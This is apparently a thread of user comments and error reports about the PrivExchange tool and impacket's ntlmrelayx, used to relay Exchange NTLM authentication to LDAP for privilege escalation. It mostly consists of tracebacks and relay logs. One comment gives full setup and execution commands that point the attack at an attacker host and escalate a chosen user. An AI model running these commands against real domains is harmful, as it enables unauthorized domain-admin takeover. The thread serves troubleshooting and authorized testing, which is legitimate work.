I run it on Windows, and I added argument with '--smb-port 2019' and then use 'netsh interface portproxy add v4tov4 listenport=445 listenaddress=192.168.101.108 connectport=2019 connectaddress=192.168.101.108' to redirect port 445.But I got this error message.

`C:\Users\Administrator\Desktop\impacket-master\impacket-master\examples>ntlmrela
yx.py -t ldap://win-7se28dskt0r.test.com --escalate-user test001 --smb-port 2
019
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[] Protocol Client HTTPS loaded..
[] Protocol Client HTTP loaded..
[] Protocol Client IMAPS loaded..
[] Protocol Client IMAP loaded..
[] Protocol Client LDAPS loaded..
[] Protocol Client LDAP loaded..
[] Protocol Client MSSQL loaded..
[] Protocol Client SMB loaded..
[] Protocol Client SMTP loaded..
[] Running in relay mode to single host
[] Setting up SMB Server
[] Setting up HTTP Server

[] Servers started, waiting for connections
[] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com
[] HTTPD: Client requested path: /privexchange/
[] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com
[] HTTPD: Client requested path: /privexchange/
[!] The client requested signing. Relaying to LDAP will not work! (This usually
happens when relaying from SMB to LDAP)
[] HTTPD: Client requested path: /privexchange/
[-] Authenticating against ldap://win-7se28dskt0r.test.com as \ FAILED
[*] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com`

File ".\ntlmrelayx.py", line 336, in
c = start_servers(options, threads)
File ".\ntlmrelayx.py", line 169, in start_servers
s = server(c)
File "build\bdist.win-amd64\egg\impacket\examples\ntlmrelayx\servers\smbrelayserver.py", line 88, in init
File "build\bdist.win-amd64\egg\impacket\smbserver.py", line 3703, in init

File "c:\python27\lib\SocketServer.py", line 417, in init
self.server_bind()
File "c:\python27\lib\SocketServer.py", line 431, in server_bind
self.socket.bind(self.server_address)
File "c:\python27\lib\socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 10013] An attempt was made to access a socket in a way forbidden by its access permissions

Traceback (most recent call last):
File "privexchange.py", line 213, in
main()
File "privexchange.py", line 137, in main
session.request("POST", ews_url, POST_BODY % attacker_url, headers)
File "/usr/lib/python2.7/httplib.py", line 1042, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.7/httplib.py", line 1082, in _send_request
self.endheaders(body)
File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
self.send(msg)
File "/usr/lib/python2.7/httplib.py", line 844, in send
self.connect()
File "/usr/lib/python2.7/httplib.py", line 1263, in connect
server_hostname=server_hostname)
File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
_context=self)
File "/usr/lib/python2.7/ssl.py", line 617, in init
self.do_handshake()
File "/usr/lib/python2.7/ssl.py", line 846, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:726)

A quick question, so I tested my local network exchange server using ntlmrelayx and privexchange.py, and I had two results:
The first one I got rpc_s_access_denied, which I don't know if my local exchange server is secured or not:
[*] Authenticating against smb://DomainController1 as Local\CSXCH01$ SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

The second:
[-] Negotiating NTLM with smb://DomainController2 failed. Skipping to next target
[] HTTPD: Received connection from xxx.xxx.xxx.xx, attacking target smb://DomainController2
[] HTTPD: Client requested path: /c7onjkvrkg
[-] SMBCLient error: Connection was reset. Possibly the target has SMBv1 disabled. Try running ntlmrelayx with -smb2support

line 215: if int(versioninfo.get('MajorVersion')) == 14:
logging.info('Exchange 2010 detected. This version is not vulnerable to PrivExchange.')

line 67: EXCHANGE_VERSIONS = ["2010_SP1","2010_SP2","2013","2016"]

I'm so confused that if all service pack of Exchange 2010 are not affected by privexchange or just SP3.

I am having the problem on Windows

File "privexchange.py", line 221, in
main()
File "privexchange.py", line 140, in main
session.request("POST", ews_url, POST_BODY % (args.exchange_version, attacker_url), headers)
File "/usr/lib/python2.7/httplib.py", line 1042, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.7/httplib.py", line 1082, in _send_request
self.endheaders(body)
File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
self.send(msg)
File "/usr/lib/python2.7/httplib.py", line 844, in send
self.connect()
File "/usr/lib/python2.7/httplib.py", line 1263, in connect
server_hostname=server_hostname)
File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
_context=self)
File "/usr/lib/python2.7/ssl.py", line 617, in init
self.do_handshake()
File "/usr/lib/python2.7/ssl.py", line 846, in do_handshake
self._sslobj.do_handshake()
socket.error: [Errno 104] Connection reset by peer

Any thoughts?

Hi dude :) nice work!

I was thinking if you could add an option to select the target Exchange version.

<t:RequestServerVersion Version="Exchange2013" />

This would not work when attacking Exchange 2010 for example. The possible strings are:

Exchange2010_SP1
Exchange2010_SP2
Exchange2010_SP3
Exchange2013
Exchange2016

Thank you!!

I'm running this from Centos7 and get a callback from Exchange (according to tcpdump), but ntlmrelayx isn't relaying the traffic. Not sure what I'm doing wrong.

Install:
git clone https://github.com/dirkjanm/PrivExchange.git
edit line 60 of PrivExchange/httpattack.py to:
attacker_url = 'http://attackerhost.domain.com/privexchange'

git clone https://github.com/SecureAuthCorp/impacket.git
cp PrivExchange/httpattack.py impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py
cd impacket && pip install -e .

Execution:
(split screen w/ tmux)
Screen 1:
sudo ntlmrelayx.py -t ldap://dc.domain.com --escalate-user exchangeUser
Executes without error: "[*] Servers started, waiting for connections"

Screen 2:
python privexchange.py -ah attackerhost.domain.com outlook.domain.com -u exchangeUser -d domain.com
Again, executes without error: "Using attacker URL: http://attackerhost.domain.com/privexchange/," "authentication was OK," "API call was successful," yadda, yadda...

I fire up tcpdump:
tcpdump -i em1 port 80
And I see HTTP traffic coming from the exchange server to attackerhost.domain.com, but I don't see anything happening on Screen 1 with ntlmrelayx.

Am I missing something?

[] HTTPD: Received connection from X.X.X.X, attacking target ldap://DC.LOCAL
[] HTTPD: Client requested path: /privexchange/
[] HTTPD: Received connection from X.X.X.X, attacking target ldap://DC.LOCAL
[] HTTPD: Client requested path: /privexchange/
[] HTTPD: Client requested path: /privexchange/
[] Authenticating against ldap://DC.LOCAL as DOMAIN\XCHSRV$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains

[*] Enumerating relayed user's privileges. This may take a while on large domains
Exception in thread Thread-17:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 313, in run
userSid, privs = self.validatePrivileges(self.username, domainDumper)
File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 165, in validatePrivileges
user = self.client.entries[0]
IndexError: list index out of range

Any ideas?

Can this project support Exchange 2019, Windows server 2012.

Hi Dirk-jan, is there a way to determine exploitability without fully exploiting AD? i.e. stopping after the Exchange server's SYSTEM hash is collected.

Hi Dirk,

When i ran privexechange i have:
Authentication was Ok and Api call was successful but nothing happen in the ntmlrelayx windows

after fixing the privexchange.py to use python3 (using the 2to3 tool), I'm still getting a connection refused error (which I was getting before I adjusted the 1 line to work with py3)

please advise...

python3 privexchange.py -u username -d domain.local -ah attacker.ip --attacker-page / victim.ip

INFO: Using attacker URL: http://10.10.14.24/ Traceback (most recent call last): File "privexchange.py", line 225, in <module> main() File "privexchange.py", line 140, in main session.request("POST", ews_url, POST_BODY % (args.exchange_version, attacker_url), headers) File "/usr/lib/python3.7/http/client.py", line 1252, in request self._send_request(method, url, body, headers, encode_chunked) File "/usr/lib/python3.7/http/client.py", line 1298, in _send_request self.endheaders(body, encode_chunked=encode_chunked) File "/usr/lib/python3.7/http/client.py", line 1247, in endheaders self._send_output(message_body, encode_chunked=encode_chunked) File "/usr/lib/python3.7/http/client.py", line 1026, in _send_output self.send(msg) File "/usr/lib/python3.7/http/client.py", line 966, in send self.connect() File "/usr/lib/python3.7/http/client.py", line 1414, in connect super().connect() File "/usr/lib/python3.7/http/client.py", line 938, in connect (self.host,self.port), self.timeout, self.source_address) File "/usr/lib/python3.7/socket.py", line 727, in create_connection raise err File "/usr/lib/python3.7/socket.py", line 716, in create_connection sock.connect(sa) ConnectionRefusedError: [Errno 111] Connection refused

Well not an issue actually ^^
Just wanted to let you know that it seems, that you cannot get to Domain Admin in an environment where the exchange is 2016 CU11 on Server 2016 and the DC is Server 2016. I mean it sort of works, the API Call succeeds and so does the Authentication of the Exchange Account.

I got the Domain Information (Users, Policies...) but after enumerating user rights nothing was printed, so i assume that nothing was found?

Hope this helps :)

I tried your recommended fix and those broke Exchange in a terrible way:

• Enabling FE extended protection (with or without kernel mode) with break authentication
• Removing the DisableLoopbackCheck will also break authentication

This when authentication is done behind a L7 load-balancer! I suggest this be clarified before other break their exchange. Doesn't seem to be a problem with a single exchange server.

Email is firstname.lastname
Username is first inital+lastname

Any workaround to get it to work.

I get the authentication OK, but then error because there is no mailbox

Could this perhaps be merged with impacket as an example? :)

Hi,
I'm strugling to get privexchange issue a request to my EWS, but all it does it merely fails to resolve my target. For a testing purposes, I'm in the same segment as target machine (Exchange 2013), my linux host is able to resolve that exch01 DNS name, also nmap points me that it's 443 is open. Any hints left to share?